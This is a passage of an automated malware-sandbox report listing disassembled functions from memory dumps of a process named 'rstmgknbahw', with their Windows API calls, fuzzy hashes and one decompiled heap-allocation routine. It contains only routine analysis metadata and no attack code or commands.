Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: aa9ff16f9cd95e4223fb0fd1f5ed79f8c0f5d33ac8317de92ad6c4fa340d104d
Instruction ID: afc22ac322dad96112cd005a61f132379c2f5231a3bcd2638ed45322cffc3969
Opcode Fuzzy Hash: aa9ff16f9cd95e4223fb0fd1f5ed79f8c0f5d33ac8317de92ad6c4fa340d104d
Instruction Fuzzy Hash: B0218EB1600704AFE721DF55CC84F66BBE8EF14720F08856AE945CB252E764E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BB8A Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A8BC01

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7ab977c0174aa161647ffb160d4dddfc3c3085b27c9c5e6590bcf447fb01fc78
Instruction ID: 2891a218f6dbbdfbb2f3099138d1ab08cd25f0f68cdaa595a1b73e5fbc4ecfd9
Opcode Fuzzy Hash: 7ab977c0174aa161647ffb160d4dddfc3c3085b27c9c5e6590bcf447fb01fc78
Instruction Fuzzy Hash: 042190754097C09FDB228B21DC50A62BFB0EF17324F0D84DAEDC44F163D265A958D762

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A59B Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A606

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 15d35df462b8bcd4ce82bf1a1eed04d0bca8ebdc0f8cce81650fef744b69cc25
Instruction ID: 4e6478234f7b8cb528a49dcb4d08a10d222143cde83945204e18152fe13f7d8d
Opcode Fuzzy Hash: 15d35df462b8bcd4ce82bf1a1eed04d0bca8ebdc0f8cce81650fef744b69cc25
Instruction Fuzzy Hash: 5811A271409380AFDB228F55DC44A62FFF4EF56310F08849AED858F152D275A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BF0F Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A8BF79

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 68324ed7f7dad972245864ff75cf8b7350f6defdab30b7b620040266df2212f3
Instruction ID: 058b0dbff37f4b2334cb1fbd39256f0a2950d18d277c2f48bff3b62f80b4e0b5
Opcode Fuzzy Hash: 68324ed7f7dad972245864ff75cf8b7350f6defdab30b7b620040266df2212f3
Instruction Fuzzy Hash: C311AC35409380AFDB228B25CC85A52FFB4EF16220F0885DEED858B562D265A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C70205 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04C70270

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 226c139a46e35272870505cad42f76da566971c6cb16c96ff7331ce875912ece
Instruction ID: de1aa65aea8e0f3ce4cbf42a651a9642f8d1bce0849c28a9eeda20b834e30b2c
Opcode Fuzzy Hash: 226c139a46e35272870505cad42f76da566971c6cb16c96ff7331ce875912ece
Instruction Fuzzy Hash: 32117C7540D3C0AFD7128B259C84B61BFB4EF47624F0980DAED848F263D269A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BADE Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 00A8BB4A

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 6bd4cb523526f045b12ebfeaadac72e785cde6cedaca7cb4c698da7b75484f17
Instruction ID: ff2dd896176b3f41cb68138a5b010c3fa54f6f0c25c520e8f9ae80ecac5b7c7b
Opcode Fuzzy Hash: 6bd4cb523526f045b12ebfeaadac72e785cde6cedaca7cb4c698da7b75484f17
Instruction Fuzzy Hash: DB1172714093809FDB228F55DC84A52FFF4EF49320F08859EED858F562D375A458CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04C702B4 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: bd7ca01b9cdcf9815e8ba14b5e95679ca5521bcf79ae010047e6c088d1553b68
Instruction ID: b57aaf5fe8ae8b90817eb67b8ae30b4f926570fa58f4667f73660d57b38355f6
Opcode Fuzzy Hash: bd7ca01b9cdcf9815e8ba14b5e95679ca5521bcf79ae010047e6c088d1553b68
Instruction Fuzzy Hash: AF11C6725093809FD751CF26DC84B56BFE8EF42220F0884AAED49CF252D274E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B572 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 00A8B5BA

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: f819a0684da673c6d6104f9ce25b8a8b92f8a1fdbc5220c344ea39875d7a331a
Instruction ID: 09a5ac53a4d484c608d01656f2df0c5e394711fd2c07b2b04fb092130a50e968
Opcode Fuzzy Hash: f819a0684da673c6d6104f9ce25b8a8b92f8a1fdbc5220c344ea39875d7a331a
Instruction Fuzzy Hash: 840161756006418FE764DF1AD884B66FBE8EF04720F08C06ADD468B655D774E808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A948 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00A8A9A2

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ead9245dbbc97c201ed6006af57db45a519157ed10726387715fcd62f9cde25d
Instruction ID: 9dbad1f4c7b2a008d38bceca546b6d0faac343d2dcf6708bf26b0a4a9515a1fd
Opcode Fuzzy Hash: ead9245dbbc97c201ed6006af57db45a519157ed10726387715fcd62f9cde25d
Instruction Fuzzy Hash: 1C11AC314097849FD7218F15DC84B52FFB4EF16320F09849AED858F262D375A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04C702D2 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e0742536c27ad5e8ccf8417ebfba3ab0b64fddfc4d5d272ce66ec5d5999220d1
Instruction ID: bb002326c9e196423304caf9d14e68dca4d6ed867305d0b3b57b938dc31b6039
Opcode Fuzzy Hash: e0742536c27ad5e8ccf8417ebfba3ab0b64fddfc4d5d272ce66ec5d5999220d1
Instruction Fuzzy Hash: DD017175A043408FDB60CF6BD885766FB98EF00620F08C4AADD49CF646E678E504CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A5C2 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A8A606

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1e4a4f0518c9f515e3215d39810b7d719cee4dd4a9c403961bff95ed6f7936e8
Instruction ID: 969a6bbdcb542ec08a9f20d1426a0d34e3fef69e437f01e5c21e82e4ff8568e7
Opcode Fuzzy Hash: 1e4a4f0518c9f515e3215d39810b7d719cee4dd4a9c403961bff95ed6f7936e8
Instruction Fuzzy Hash: 1D016D315047409FEB218F95D944B56FFE0EF18320F0889AADD494A655E376E418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BB06 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 00A8BB4A

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 89ed1c753380bf02a11ef599afc4b4c2a2e8b0b9a1542f49c23b45fafe20424f
Instruction ID: 67a253d7e9ad493f9251af1396de8b1d4b25ca91c706521de6363ed927a2b54d
Opcode Fuzzy Hash: 89ed1c753380bf02a11ef599afc4b4c2a2e8b0b9a1542f49c23b45fafe20424f
Instruction Fuzzy Hash: 2F012D71504740DFDB219F95D884B56FFA0FF18320F0889AAEE8A4B626D375E418DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B0CA Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A8B11A

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: cf9b03b051e761fbb051e9cd0874f7b99f3171f3d80fa10855fbc1b23ba321e8
Instruction ID: 5a4972574ad391fce2e12670c6cdad8015a0e796ff4f42b4d3f7d849658436c5
Opcode Fuzzy Hash: cf9b03b051e761fbb051e9cd0874f7b99f3171f3d80fa10855fbc1b23ba321e8
Instruction Fuzzy Hash: AD01A271500601ABD214DF1ADC82B22FBA4FB89B20F14815AED084B741E235F516CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BF3E Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A8BF79

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6698283dc368849411d51a7c251e513994f957a176eb0fcdc02e0e457ddcc8ea
Instruction ID: 2ac262389faa89f39d5a400d5a5fd763937224d61b70b190467e5f14fc822306
Opcode Fuzzy Hash: 6698283dc368849411d51a7c251e513994f957a176eb0fcdc02e0e457ddcc8ea
Instruction Fuzzy Hash: 86019A355103409FDB208F56DC84B66FBA0EF14320F08C0AAEE498AA52D375E818DF72

Uniqueness

Uniqueness Score: -1.00%

Function 00A8BBC6 Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 00A8BC01

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d51aad5dc8233c96fb4c56dbb92f57db651b82cd62a0603dffc1581aac4e0f01
Instruction ID: 92dd3889ff47b6fbc09e7ce47db3a7c92644aa3767adaa1dfaefb4a0564fdb88
Opcode Fuzzy Hash: d51aad5dc8233c96fb4c56dbb92f57db651b82cd62a0603dffc1581aac4e0f01
Instruction Fuzzy Hash: D801AD75500744DFDB209F46D884B21FFA0EF18320F08C49ADD894B626D775E458DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A96A Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00A8A9A2

Memory Dump Source

Source File: 00000006.00000002.734608955.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a8a000_rstmgknbahw.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 3b01d73552b2fd057f31e10ebc3b1d966ec8ca39e5c2e4afeb4d1375c317b528
Instruction ID: a958358ecaafb8d0da6c39bd9b951c09d9dfbea982dfd701dc1e80bfdb6bdcc1
Opcode Fuzzy Hash: 3b01d73552b2fd057f31e10ebc3b1d966ec8ca39e5c2e4afeb4d1375c317b528
Instruction Fuzzy Hash: B001AD355087409FEB208F46D884B11FFA0EF14320F08C49ADD490B656D379E418DB73

Uniqueness

Uniqueness Score: -1.00%

Function 04C7023E Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04C70270

Memory Dump Source

Source File: 00000006.00000002.735355072.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c70000_rstmgknbahw.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 93b473ca2d06503f998d192e0505e4b85c2acc8e31a8a0b09c5b439bce815417
Instruction ID: 6d2b5640cb1d67844a5554eed7f36f256799207f40f38c208be1da04110c9bd7
Opcode Fuzzy Hash: 93b473ca2d06503f998d192e0505e4b85c2acc8e31a8a0b09c5b439bce815417
Instruction Fuzzy Hash: AFF0AF369087408FDB608F07D884761FFA0EF04321F08C0AADE494F656E379E508CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00A82477 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

Pfq, xrefs: 00A825DC

Memory Dump Source

Source File: 00000006.00000002.734600924.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a82000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: Pfq
API String ID: 0-2270722601
Opcode ID: ebb7f73d967e624c198de43f41c75e5b01ca4808c2c64b9c5203b6b3888ac3c7
Instruction ID: aff7e5c8eabaa75a4a72b81a1f308e5762812ba5cf155b6535dba0a640078812
Opcode Fuzzy Hash: ebb7f73d967e624c198de43f41c75e5b01ca4808c2c64b9c5203b6b3888ac3c7
Instruction Fuzzy Hash: AB71B37698D3C19FDB176B3498353A4BF70AF67321B4A40DBD4808F1E3D2285949C766

Uniqueness

Uniqueness Score: -1.00%

Function 049E02E8 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

:@fq, xrefs: 049E0537

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: e027219d83dce205b0150e9c22fd7cd85d24818f0cc2997ea8f4654f32bd3b26
Instruction ID: 60ed09e234b05baf5d4c59b264ec547866885b5bbfb2db3b47f5408295aa1a27
Opcode Fuzzy Hash: e027219d83dce205b0150e9c22fd7cd85d24818f0cc2997ea8f4654f32bd3b26
Instruction Fuzzy Hash: DD51BD34B052158FCB05DF69C4547BEBBF2EF89300F2484A9D4069B365EA75AC06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 049E21F8 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 049E230F

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 6b91ed783531d74df55493a51ba1f2254d1092d01806a9aea1c608ffd2ede93f
Instruction ID: 1a31e6075ae6d593aea0e06f4cfcc23144db7bd275158f8abcba36099295528f
Opcode Fuzzy Hash: 6b91ed783531d74df55493a51ba1f2254d1092d01806a9aea1c608ffd2ede93f
Instruction Fuzzy Hash: 90411C30E04209DFCF49DBA6C5456BEBBB6FB45300F1088BAD412A7265EB34AA05DF52

Uniqueness

Uniqueness Score: -1.00%

Function 049E12A0 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f127c4ec0c7a6fd4dbfc9cf6c7c232b07017c553eaaa4e7992b5249192732685
Instruction ID: f6fd0de1abbc1f4e2aec3eede310e45959888664f37381e71f3c8bd5a7453673
Opcode Fuzzy Hash: f127c4ec0c7a6fd4dbfc9cf6c7c232b07017c553eaaa4e7992b5249192732685
Instruction Fuzzy Hash: 2222D138A00A45CFCB25DF25C580A6AB7F2FF88310F50C9A9D85A9B75ADB34AD45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 049E09A5 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09016016ef10a8c1e038592b0de5df5ee2b882956ede546e5a6042760d6d7afb
Instruction ID: 0d072a71b0b59e24b3d6a0ee93cec634f5aeb09958bfbaf6d1d90b21b98826f0
Opcode Fuzzy Hash: 09016016ef10a8c1e038592b0de5df5ee2b882956ede546e5a6042760d6d7afb
Instruction Fuzzy Hash: E151E131B00265EFCF159BA9D854ABEB7F3BF84304F248566E4469B250DBB0AC02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049E0BC0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebfa0358f47f2649f6abff4e567bead16b098a5ee655653cedffd4bfcccb9de
Instruction ID: 24c0a25d9428d13f4633afddfc9c95df8aae11d4bf5fd6b0dd3d7e4fbad8d0cc
Opcode Fuzzy Hash: aebfa0358f47f2649f6abff4e567bead16b098a5ee655653cedffd4bfcccb9de
Instruction Fuzzy Hash: 3A410331B011188FC7169B6AC4147BE77F7AF85300F15846AE80AAF3A0DEB1ED069791

Uniqueness

Uniqueness Score: -1.00%

Function 049E1458 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4630b473a7e37ef2b7ec0d16f62a9e9034b4009322f7c32a4ca736f4952cf54
Instruction ID: fc37a6ccf54a79493b6b2a41f6a786510052ed73bf3127848d0aab9f5ec66d2c
Opcode Fuzzy Hash: e4630b473a7e37ef2b7ec0d16f62a9e9034b4009322f7c32a4ca736f4952cf54
Instruction Fuzzy Hash: A2511834A01258CFDB15EF64C894BADBBB2BF88300F5081E9D40AAB365DB35AD84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 049E2BF8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598f7e8bf6234574878603a2bd9d8ccdc8d505a79fa4d2f444147c9f2481ab33
Instruction ID: 949ec01f06ed6c88b838925d6a496cbca68859bb6b7d000bc33029a1d2d83cbf
Opcode Fuzzy Hash: 598f7e8bf6234574878603a2bd9d8ccdc8d505a79fa4d2f444147c9f2481ab33
Instruction Fuzzy Hash: 9241033430C295DFC3178B2BC898A397FBEAF42200B1989FBD056CB262DA61EC05D751

Uniqueness

Uniqueness Score: -1.00%

Function 049E02DA Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da960f01bdbd2980fe3efe61854fb45396d71cf47ef78876e4d7bd5896e404e
Instruction ID: 001cbdd6598b70dd657e63456ea83c6953d04f8274f2fc29c660b0ee21363d51
Opcode Fuzzy Hash: 9da960f01bdbd2980fe3efe61854fb45396d71cf47ef78876e4d7bd5896e404e
Instruction Fuzzy Hash: 34318D74B01215CFDB15CF69C194BBE7BB6EF88310F144879D402AB3A5EBB1AC458B50

Uniqueness

Uniqueness Score: -1.00%

Function 049E1290 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8550be333fa837cfc11fd51c6603034c6d5572a699a0d48b3a3b1b96d811127
Instruction ID: e0bfb5e77914ebd2ab0763bfca1c3b8222cc79e76bf14c726de180e442d0595d
Opcode Fuzzy Hash: b8550be333fa837cfc11fd51c6603034c6d5572a699a0d48b3a3b1b96d811127
Instruction Fuzzy Hash: A2412A34A04258CFDB25DF65C885BADBBB2BF49340F1084EAD44AAB355EB30AD84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 049E20D0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2308552233e869b900b3501c7aea647ed9949f61e9710bdf3e5e8fc1802e5cfb
Instruction ID: b289613e3270c7390e4ab637eff3d2d06959413922d6355eff902e99eb7a1f70
Opcode Fuzzy Hash: 2308552233e869b900b3501c7aea647ed9949f61e9710bdf3e5e8fc1802e5cfb
Instruction Fuzzy Hash: 36316130B05249DFCB06DFA9C880A7E7BBAEB85340B2184E6C5159B295E731AD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 049E0006 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a22637e19fd0ad47bd4db25deb1f2174468ae424670ed97c51d5815b3c1977a
Instruction ID: fdb23f9a82d3cd68bedb2265e90c6914feeaeccf098865ad24e8f721ecd17290
Opcode Fuzzy Hash: 1a22637e19fd0ad47bd4db25deb1f2174468ae424670ed97c51d5815b3c1977a
Instruction Fuzzy Hash: 0931507020D3C18FCB06AB7498645697FF1EE82345B0988ABD4C2CB597EE799C09DB13

Uniqueness

Uniqueness Score: -1.00%

Function 049E25DE Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a2510466910ca782b289807f793757167a463d81b152e37da2c86e37a62d58
Instruction ID: e8152a40a33950adb07b94d73d71ba7cc9d1f7d903e679c423bfe9e8eac67fed
Opcode Fuzzy Hash: f1a2510466910ca782b289807f793757167a463d81b152e37da2c86e37a62d58
Instruction Fuzzy Hash: 4B318F31A00245CFDB21DFA6C8443AABBF6BF85304F24C26AC004AB265DB74A58ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 049E21E9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 853732d53f00f21a7d2d920ce529f0239a20a1d8cda88eb1b9c0c6186ba20fea
Instruction ID: 20f1de74787ab886dfe4d82ab4c50175ccdd3da1ddf04c70f415a2e658f715f9
Opcode Fuzzy Hash: 853732d53f00f21a7d2d920ce529f0239a20a1d8cda88eb1b9c0c6186ba20fea
Instruction Fuzzy Hash: AC314C70E08209DFCB49DBB5C1446BDBBB6FF45300F1048BAD402AB366EA35AA05DB52

Uniqueness

